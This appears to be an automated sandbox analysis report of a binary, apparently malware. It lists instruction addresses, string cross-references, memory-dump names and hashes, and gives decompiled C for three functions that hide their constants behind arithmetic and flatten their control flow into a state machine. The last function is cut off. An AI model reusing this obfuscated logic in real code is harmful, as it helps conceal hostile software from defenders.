0x00224323
0x0022432e
0x00224330
0x00224338
0x0022433d
0x00224342
0x00224344
0x00224348
0x0022434d
0x00224355
0x0022435d
0x00224365
0x0022436a
0x00224372
0x0022437d
0x00224388
0x00224393
0x0022439b
0x002243a0
0x002243a8
0x002243b0
0x002243b8
0x002243c3
0x002243cb
0x002243d6
0x002243de
0x002243ed
0x002243f0
0x002243f4
0x002243fc
0x00224404
0x00224409
0x00224411
0x00224419
0x00224421
0x00224429
0x0022442e
0x00224433
0x0022443b
0x00224443
0x0022444b
0x00224453
0x0022445b
0x00224463
0x0022446e
0x00224479
0x00224484
0x00224494
0x0022449c
0x0022449f
0x002244a3
0x002244ab
0x002244b3
0x002244bb
0x002244c3
0x002244cb
0x002244d6
0x002244e1
0x002244ee
0x002244fd
0x00224500
0x00224504
0x0022450c
0x00224514
0x0022451c
0x00224524
0x0022452c
0x00224534
0x00224541
0x00224545
0x0022454d
0x00224555
0x00224568
0x0022456f
0x0022457a
0x00224582
0x00224587
0x0022458f
0x00224597
0x0022459f
0x002245af
0x002245b3
0x002245b8
0x002245c0
0x002245c8
0x002245d4
0x002245d9
0x002245df
0x002245e7
0x002245f4
0x002245f5
0x002245f9
0x00224601
0x00224609
0x00224611
0x00224616
0x0022461e
0x00224629
0x00224634
0x0022463f
0x00224647
0x0022464f
0x00224657
0x0022465f
0x00224667
0x0022466f
0x00224674
0x0022467c
0x0022468a
0x0022468e
0x00224696
0x0022469b
0x002246a3
0x002246ab
0x002246b3
0x002246bb
0x002246c3
0x002246cb
0x002246d0
0x002246d8
0x002246e0
0x002246f0
0x002246f5
0x002246fe
0x00224709
0x00224714
0x0022471f
0x0022472a
0x00224735
0x0022473d
0x00224748
0x00224750
0x00224758
0x0022475d
0x00224765
0x0022476d
0x00224778
0x00224780
0x0022478b
0x00224793
0x0022479b
0x002247a3
0x002247ab
0x002247b3
0x002247be
0x002247c9
0x002247d4
0x002247e0
0x002247e3
0x002247e7
0x002247ef
0x002247f6
0x002247fa
0x002247fa
0x002247ff
0x002247ff
0x00224805
0x00000000
0x00000000
0x0022480b
0x0022480b
0x00224939
0x0022494b
0x00224950
0x00224955
0x002249e0
0x002249e0
0x00000000
0x0022495b
0x00224966
0x0022496e
0x00224980
0x00224984
0x00224988
0x00000000
0x00224988
0x00000000
0x00224811
0x00224813
0x002248d7
0x002248fa
0x002248fd
0x00224902
0x00224a70
0x00224a70
0x00224a74
0x00000000
0x00224819
0x0022481f
0x002248a2
0x002248a9
0x00000000
0x00224821
0x00224827
0x00000000
0x00224aa3
0x00224833
0x00224877
0x0022487c
0x00224884
0x00000000
0x00224835
0x0022483b
0x00224a79
0x00224a7f
0x00224a81
0x002247ff
0x002247ff
0x00224805
0x00000000
0x00000000
0x00000000
0x00224805
0x00000000
0x002247ff
0x00224841
0x00224850
0x00224851
0x00224857
0x0022485c
0x00224862
0x00224868
0x0022486d
0x0022486d
0x00224871
0x00224871
0x00000000
0x00224871
0x00224862
0x0022483b
0x00224833
0x0022481f
0x00224813
0x00224aae
0x00224aae
0x00000000
0x00224990
0x00224996
0x00224a4d
0x00224a4e
0x00224a54
0x00224a59
0x00224a5f
0x00224a6b
0x00000000
0x00224a61
0x00224a61
0x00000000
0x00224a61
0x0022499c
0x002249a2
0x00224a10
0x00224a15
0x00224a19
0x00224a1e
0x00224a25
0x00224a2e
0x00224a33
0x00000000
0x002249a4
0x002249aa
0x002249d8
0x002249dd
0x00000000
0x002249ac
0x002249b2
0x00000000
0x002249b8
0x002249b8
0x00000000
0x002249b8
0x002249b2
0x002249aa
0x002249a2
0x00000000
0x00224996
0x002247ff

Strings

+^, xrefs: 00224463
dEH, xrefs: 0022473D
R.93, xrefs: 002249A4
l), xrefs: 00224355
R.93, xrefs: 002248F0
RESCDIR, xrefs: 00224852

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: +^$R.93$R.93$RESCDIR$dEH$l)
API String ID: 0-1973027218
Opcode ID: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
Instruction ID: e32271bd47b3a278670e0ca78b8e98d4e44e746d42d4de42b05097b0aeb71132
Opcode Fuzzy Hash: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
Instruction Fuzzy Hash: 7E0242725183819FE368DF64C88AA5BFBE1FBC4314F108A1DE5D996260DBB48949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002202C3, Relevance: 7.7, Strings: 6, Instructions: 248
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002202C3() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t245;
				signed int _t247;
				void* _t249;
				signed int _t254;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t290;
				void* _t293;
				void* _t298;
				signed int* _t300;

				_t300 =  &_v676;
				_v580 = 0x66ae1;
				_v576 = 0xbd1a2;
				_v572 = 0x272c23;
				_t258 = 0x33;
				_t256 = 0;
				_t293 = 0x3b419076;
				_v568 = 0;
				_v640 = 0x1372;
				_v640 = _v640 / _t258;
				_v640 = _v640 | 0x4a3401ed;
				_v640 = _v640 ^ 0x4a34016d;
				_v660 = 0x5e98;
				_v660 = _v660 >> 0xe;
				_v660 = _v660 | 0x7267fa90;
				_t259 = 0x75;
				_v660 = _v660 / _t259;
				_v660 = _v660 ^ 0x00fa5318;
				_v652 = 0x5e75;
				_v652 = _v652 << 0x10;
				_v652 = _v652 + 0x48dc;
				_t260 = 0x18;
				_v652 = _v652 / _t260;
				_v652 = _v652 ^ 0x03efb4d1;
				_v608 = 0xe223;
				_t261 = 0x3f;
				_v608 = _v608 / _t261;
				_v608 = _v608 ^ 0x000070cc;
				_v656 = 0xb48f;
				_v656 = _v656 >> 6;
				_t262 = 0x3a;
				_v656 = _v656 / _t262;
				_v656 = _v656 + 0xde3a;
				_v656 = _v656 ^ 0x0000cbaf;
				_v612 = 0x15cc;
				_v612 = _v612 ^ 0x9ca6d169;
				_v612 = _v612 ^ 0x9ca6af9c;
				_v668 = 0xa8de;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xffff49ed;
				_t263 = 0x34;
				_v668 = _v668 / _t263;
				_v668 = _v668 ^ 0x00000193;
				_v596 = 0xe25b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x000030c3;
				_v636 = 0xc7ea;
				_v636 = _v636 << 0xa;
				_v636 = _v636 | 0x82c54243;
				_v636 = _v636 ^ 0x83dfaf9b;
				_v620 = 0x2a3e;
				_v620 = _v620 + 0xffff612f;
				_v620 = _v620 ^ 0xffffe842;
				_v644 = 0x52e;
				_t264 = 0x44;
				_v644 = _v644 * 0x2b;
				_v644 = _v644 + 0x1b45;
				_v644 = _v644 ^ 0x0000a38b;
				_v664 = 0x7c05;
				_v664 = _v664 / _t264;
				_v664 = _v664 + 0xfffff3de;
				_t265 = 0xd;
				_v664 = _v664 * 0x41;
				_v664 = _v664 ^ 0xfffd1fed;
				_v672 = 0x7153;
				_v672 = _v672 * 0x55;
				_v672 = _v672 + 0xffff3073;
				_v672 = _v672 | 0x19b2f735;
				_v672 = _v672 ^ 0x19b69e67;
				_v624 = 0x6a46;
				_v624 = _v624 << 6;
				_v624 = _v624 ^ 0x001a8e62;
				_v676 = 0x6586;
				_v676 = _v676 | 0x5a6bf539;
				_v676 = _v676 / _t265;
				_v676 = _v676 << 0xf;
				_v676 = _v676 ^ 0x4e5fab63;
				_v632 = 0x1a9f;
				_v632 = _v632 + 0x62a3;
				_v632 = _v632 ^ 0x000002a8;
				_v616 = 0x8464;
				_v616 = _v616 | 0x13bf265e;
				_v616 = _v616 ^ 0x13bfdd6d;
				_v592 = 0xbadb;
				_t266 = 0x3d;
				_t292 = _v632;
				_v592 = _v592 * 0x69;
				_v592 = _v592 ^ 0x004cce95;
				_v604 = 0xca90;
				_v604 = _v604 >> 0xc;
				_v604 = _v604 ^ 0x00007684;
				_v648 = 0x358b;
				_v648 = _v648 << 1;
				_v648 = _v648 << 9;
				_v648 = _v648 / _t266;
				_v648 = _v648 ^ 0x0003f328;
				_v600 = 0xe7dd;
				_v600 = _v600 ^ 0xaf509c9e;
				_v600 = _v600 ^ 0xaf5010b9;
				_v628 = 0xd224;
				_t245 = _v628;
				_t267 = 0x19;
				_t290 = _t245 % _t267;
				_v628 = _t245 / _t267;
				_v628 = _v628 ^ 0x00000864;
				do {
					while(_t293 != 0x47bbe06) {
						if(_t293 == 0xa25cde4) {
							_t249 = E0021F46D();
							_t298 = _v588 - _v548;
							asm("sbb ecx, [esp+0x94]");
							__eflags = _v584 - _t290;
							if(__eflags >= 0) {
								if(__eflags > 0) {
									L19:
									_t256 = 1;
									__eflags = 1;
								} else {
									__eflags = _t298 - _t249;
									if(_t298 >= _t249) {
										goto L19;
									}
								}
							}
						} else {
							if(_t293 == 0x13363d5d) {
								_t290 = _v604;
								_t267 = _v592;
								E0022AAAE(_t267, _t290, _v648,  &_v588, _v600);
								_t300 =  &(_t300[3]);
								_t293 = 0xa25cde4;
								continue;
							} else {
								if(_t293 == 0x1fdc46de) {
									_t290 = _v660;
									_t254 = E0021B566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
									_t292 = _t254;
									_t300 =  &(_t300[0xc]);
									__eflags = _t254 - 0xffffffff;
									if(__eflags != 0) {
										_t293 = 0x47bbe06;
										continue;
									}
								} else {
									if(_t293 == 0x350fffd6) {
										_t290 =  &_v524;
										_t255 = E00223E3F(_t267, _t290, __eflags, _v652, _v608);
										_pop(_t267);
										__eflags = _t255;
										if(__eflags != 0) {
											_t293 = 0x1fdc46de;
											continue;
										}
									} else {
										if(_t293 != 0x3b419076) {
											goto L14;
										} else {
											_t293 = 0x350fffd6;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t256;
					}
					_push(_t267);
					_t247 = E00217F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
					_t290 = _v616;
					_t267 = _v632;
					asm("sbb esi, esi");
					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
					__eflags = _t293;
					E00224F7D(_t267, _t290, _t292); // executed
					_t300 =  &(_t300[7]);
					L14:
					__eflags = _t293 - 0x2fc5a10a;
				} while (__eflags != 0);
				goto L20;
			}

0x002202c3
0x002202c9
0x002202d3
0x002202db
0x002202e9
0x002202ea
0x002202ec
0x002202f1
0x002202f5
0x00220305
0x0022030b
0x00220313
0x0022031b
0x00220323
0x00220328
0x00220334
0x00220339
0x0022033f
0x00220347
0x0022034f
0x00220354
0x00220360
0x00220365
0x0022036b
0x00220373
0x0022037f
0x00220384
0x0022038a
0x00220392
0x0022039a
0x002203a3
0x002203a8
0x002203ae
0x002203b6
0x002203be
0x002203c6
0x002203ce
0x002203d6
0x002203de
0x002203e3
0x002203ef
0x002203f2
0x002203f6
0x002203fe
0x00220406
0x0022040b
0x00220413
0x0022041b
0x00220420
0x00220428
0x00220430
0x00220438
0x00220440
0x00220448
0x00220459
0x00220461
0x00220465
0x0022046d
0x00220475
0x00220485
0x00220489
0x00220496
0x00220499
0x0022049d
0x002204a5
0x002204b2
0x002204b6
0x002204be
0x002204c6
0x002204ce
0x002204d6
0x002204db
0x002204e3
0x002204eb
0x002204fb
0x002204ff
0x00220504
0x0022050c
0x00220514
0x0022051c
0x00220524
0x0022052c
0x00220534
0x0022053c
0x00220549
0x0022054c
0x00220550
0x00220554
0x0022055c
0x00220564
0x00220569
0x00220571
0x00220579
0x0022057d
0x0022058a
0x0022058e
0x00220596
0x0022059e
0x002205a6
0x002205ae
0x002205b6
0x002205ba
0x002205bb
0x002205bd
0x002205c1
0x002205c9
0x002205c9
0x002205d7
0x002206f4
0x002206fd
0x00220708
0x0022070f
0x00220711
0x00220713
0x00220719
0x0022071b
0x0022071b
0x00220715
0x00220715
0x00220717
0x00000000
0x00000000
0x00220717
0x00220713
0x002205dd
0x002205e3
0x0022068a
0x0022068e
0x00220692
0x00220697
0x0022069a
0x00000000
0x002205e9
0x002205ef
0x0022065f
0x00220663
0x00220668
0x0022066a
0x0022066d
0x00220670
0x00220676
0x00000000
0x00220676
0x002205f1
0x002205f7
0x00220610
0x0022061b
0x00220621
0x00220622
0x00220624
0x0022062a
0x00000000
0x0022062a
0x002205f9
0x002205ff
0x00000000
0x00220605
0x00220605
0x00000000
0x00220605
0x002205ff
0x002205f7
0x002205ef
0x002205e3
0x0022071f
0x00220728
0x00220728
0x002206a4
0x002206be
0x002206c3
0x002206c9
0x002206d0
0x002206d8
0x002206d8
0x002206de
0x002206e3
0x002206e6
0x002206e6
0x002206e6
0x00000000

Strings

Sq, xrefs: 002204A5
#,', xrefs: 002202DB
u^, xrefs: 00220347
[, xrefs: 002203FE
#, xrefs: 00220373
Fj, xrefs: 002204CE

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: #,'$#$Fj$Sq$[$u^
API String ID: 0-3347335214
Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction ID: 5622c9464241869104437a0612bae75b2d546d635d202522a7ed3bb1d214e3bf
Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction Fuzzy Hash: B4B15372508381AFE358CFA4D88941BFBE2FBC4758F104A1DF095562A0D7B99A59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0021EE78, Relevance: 5.2, Strings: 4, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0021EE78() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				void* _t204;
				void* _t216;
				void* _t218;
				intOrPtr _t242;
				intOrPtr _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int* _t257;

				_t257 =  &_v1124;
				_v1056 = 0x181c5d;
				_v1052 = 0x367784;
				_t216 = 0x1144238d;
				_v1048 = 0x4ffcf6;
				_t248 = 0;
				_v1044 = 0;
				_v1088 = 0xda27;
				_t249 = 0x62;
				_v1088 = _v1088 * 0x3a;
				_t250 = 0x7a;
				_v1088 = _v1088 / _t249;
				_v1088 = _v1088 ^ 0x0000d2a1;
				_v1112 = 0x1719;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 + 0xffff2bf1;
				_v1112 = _v1112 | 0x98c770ba;
				_v1112 = _v1112 ^ 0x98cfba04;
				_v1096 = 0xeee5;
				_v1096 = _v1096 ^ 0xe08a058d;
				_v1096 = _v1096 | 0xf31efd60;
				_v1096 = _v1096 >> 0xd;
				_v1096 = _v1096 ^ 0x00079e87;
				_v1068 = 0x925f;
				_v1068 = _v1068 + 0xa627;
				_v1068 = _v1068 * 0xc;
				_v1068 = _v1068 ^ 0x000ee055;
				_v1076 = 0x1457;
				_v1076 = _v1076 * 0x3c;
				_t251 = 0x32;
				_v1076 = _v1076 / _t250;
				_v1076 = _v1076 ^ 0x00007f2a;
				_v1064 = 0x70c;
				_v1064 = _v1064 * 3;
				_v1064 = _v1064 ^ 0x000033a7;
				_v1080 = 0xbf13;
				_v1080 = _v1080 >> 0xf;
				_v1080 = _v1080 | 0xa6e1d279;
				_v1080 = _v1080 ^ 0xa6e18774;
				_v1072 = 0x855;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 * 0x6d;
				_v1072 = _v1072 ^ 0x00004ced;
				_v1060 = 0x8e6f;
				_v1060 = _v1060 + 0xe76;
				_v1060 = _v1060 ^ 0x0000eeed;
				_v1116 = 0x7f13;
				_v1116 = _v1116 + 0x7bf9;
				_v1116 = _v1116 + 0xffffe522;
				_v1116 = _v1116 + 0x76b9;
				_v1116 = _v1116 ^ 0x000120a7;
				_v1124 = 0x4a8d;
				_v1124 = _v1124 + 0xb0fa;
				_t252 = 0x18;
				_v1124 = _v1124 / _t251;
				_v1124 = _v1124 ^ 0xe1689f92;
				_v1124 = _v1124 ^ 0xe168b829;
				_v1104 = 0x6fdc;
				_v1104 = _v1104 / _t252;
				_v1104 = _v1104 ^ 0xd1a01b12;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 ^ 0x0006b7bc;
				_v1120 = 0x3441;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 | 0xb521b1d3;
				_v1120 = _v1120 ^ 0x6f352f49;
				_v1120 = _v1120 ^ 0xda14a570;
				_v1092 = 0xdaef;
				_v1092 = _v1092 + 0xffffef8f;
				_v1092 = _v1092 | 0x558b4159;
				_v1092 = _v1092 >> 0xb;
				_v1092 = _v1092 ^ 0x000a96bc;
				_v1084 = 0x9e65;
				_v1084 = _v1084 ^ 0xd37ef8f9;
				_t253 = 0x14;
				_v1084 = _v1084 / _t253;
				_v1084 = _v1084 ^ 0x0a9307fe;
				_v1100 = 0x36e3;
				_v1100 = _v1100 + 0xffff4219;
				_v1100 = _v1100 | 0x679c7357;
				_t254 = 0x3e;
				_v1100 = _v1100 * 0x7e;
				_v1100 = _v1100 ^ 0xffbf63c1;
				_v1108 = 0x25e;
				_v1108 = _v1108 / _t254;
				_v1108 = _v1108 | 0x82073b90;
				_v1108 = _v1108 * 0x30;
				_v1108 = _v1108 ^ 0x615b4461;
				do {
					while(_t216 != 0x295ca1) {
						if(_t216 == 0x1144238d) {
							_t216 = 0x274f9b22;
							continue;
						} else {
							if(_t216 == 0x1718f041) {
								E0021C0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
							} else {
								if(_t216 == 0x274f9b22) {
									E00223E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
									_t216 = 0x295ca1;
									continue;
								} else {
									_t264 = _t216 - 0x3691f983;
									if(_t216 != 0x3691f983) {
										goto L10;
									} else {
										_push( &_v1040);
										_push( &_v520);
										E00217B63(_v1104, _v1120, _t264);
										_t248 =  !=  ? 1 : _t248;
										_t216 = 0x1718f041;
										continue;
									}
								}
							}
						}
						L13:
						return _t248;
					}
					_push(_v1068);
					_t204 = E0022889D(0x22c9b0, _v1096, __eflags);
					_pop(_t218);
					_t242 =  *0x22ca2c; // 0x558300
					_t176 = _t242 + 0x230; // 0x680053
					E0021C680(_t176, _v1064, _v1080, _t218, _v1072,  *0x22ca2c, _t204,  &_v1040);
					E00222025(_v1060, _t204, _v1116, _v1124);
					_t257 =  &(_t257[9]);
					_t216 = 0x3691f983;
					L10:
					__eflags = _t216 - 0x16e30c37;
				} while (__eflags != 0);
				goto L13;
			}

0x0021ee78
0x0021ee7e
0x0021ee88
0x0021ee90
0x0021ee95
0x0021eea1
0x0021eea3
0x0021eea7
0x0021eeb6
0x0021eeb9
0x0021eec3
0x0021eec4
0x0021eeca
0x0021eed2
0x0021eeda
0x0021eedf
0x0021eee7
0x0021eeef
0x0021eef7
0x0021eeff
0x0021ef07
0x0021ef0f
0x0021ef14
0x0021ef1c
0x0021ef24
0x0021ef33
0x0021ef37
0x0021ef3f
0x0021ef4c
0x0021ef56
0x0021ef57
0x0021ef5d
0x0021ef65
0x0021ef74
0x0021ef78
0x0021ef80
0x0021ef88
0x0021ef8d
0x0021ef95
0x0021ef9d
0x0021efa5
0x0021efaf
0x0021efb3
0x0021efbb
0x0021efc3
0x0021efcb
0x0021efd3
0x0021efdb
0x0021efe3
0x0021efeb
0x0021eff3
0x0021effb
0x0021f003
0x0021f011
0x0021f012
0x0021f016
0x0021f01e
0x0021f028
0x0021f038
0x0021f03e
0x0021f04b
0x0021f055
0x0021f05d
0x0021f065
0x0021f06a
0x0021f072
0x0021f07a
0x0021f082
0x0021f08a
0x0021f092
0x0021f09a
0x0021f09f
0x0021f0a7
0x0021f0af
0x0021f0bb
0x0021f0c0
0x0021f0c6
0x0021f0ce
0x0021f0d6
0x0021f0de
0x0021f0eb
0x0021f0ec
0x0021f0f0
0x0021f0f8
0x0021f106
0x0021f10a
0x0021f117
0x0021f11b
0x0021f123
0x0021f123
0x0021f12d
0x0021f190
0x00000000
0x0021f12f
0x0021f135
0x0021f215
0x0021f13b
0x0021f13d
0x0021f185
0x0021f18c
0x00000000
0x0021f13f
0x0021f13f
0x0021f145
0x00000000
0x0021f14b
0x0021f157
0x0021f15f
0x0021f160
0x0021f16c
0x0021f16f
0x00000000
0x0021f16f
0x0021f145
0x0021f13d
0x0021f135
0x0021f21d
0x0021f229
0x0021f229
0x0021f194
0x0021f1a1
0x0021f1a6
0x0021f1c2
0x0021f1cc
0x0021f1d2
0x0021f1e5
0x0021f1ea
0x0021f1ed
0x0021f1f2
0x0021f1f2
0x0021f1f2
0x00000000

Strings

aD[a, xrefs: 0021F11B
I/5o, xrefs: 0021F072
L, xrefs: 0021EFB3
6, xrefs: 0021F0CE

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: I/5o$aD[a$6$L
API String ID: 0-1330720659
Opcode ID: c70ead723ad4711b88d4e5612cb26e7561dd65061045414678c3d92bda49e37d
Instruction ID: 17118aa86a929f872e3e819d3174fea7e1c9a48b997defd52a653f13f2e2f2a0
Opcode Fuzzy Hash: c70ead723ad4711b88d4e5612cb26e7561dd65061045414678c3d92bda49e37d
Instruction Fuzzy Hash: 47914171118341AFD358CF65D48945BBBF6BBC4358F10892EF19A8A260D3B98A59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00217B63, Relevance: 2.7, Strings: 2, Instructions: 187
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00217B63(void* __ecx, void* __edx, void* __eflags) {
				void* _t227;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				void* _t279;
				void* _t280;

				_t279 = _t280 - 0x70;
				_push( *((intOrPtr*)(_t279 + 0x7c)));
				_push( *((intOrPtr*)(_t279 + 0x78)));
				_push(__edx);
				_push(__ecx);
				E0021602B(_t227);
				 *(_t279 + 0x5c) = 0x4f49;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
				 *(_t279 + 0x20) = 0x2d3b;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
				 *(_t279 + 0x38) = 0xada;
				_t257 = 0x56;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
				 *(_t279 + 0x44) = 0x9fd0;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
				 *(_t279 + 0x28) = 0xbdd8;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
				 *(_t279 + 0x24) = 0xa469;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
				 *(_t279 + 0x48) = 0xdd17;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
				 *(_t279 + 0x3c) = 0x840;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
				 *(_t279 + 0x34) = 0xe245;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
				 *(_t279 + 0x68) = 0x7c59;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
				 *(_t279 + 0x1c) = 0x17b0;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
				 *(_t279 + 0xc) = 0x52de;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
				 *(_t279 + 0x14) = 0xa04a;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
				 *(_t279 + 0x10) = 0x88b9;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
				 *(_t279 + 0x58) = 0x8451;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
				 *(_t279 + 0x2c) = 0xa221;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
				 *(_t279 + 0x6c) = 0xb834;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
				 *(_t279 + 0x60) = 0x6d71;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
				 *(_t279 + 0x40) = 0xcc9d;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
				 *(_t279 + 0x50) = 0xea3;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
				 *(_t279 + 0x64) = 0xe156;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
				_t258 = 0x77;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
				 *(_t279 + 0x54) = 0xb949;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
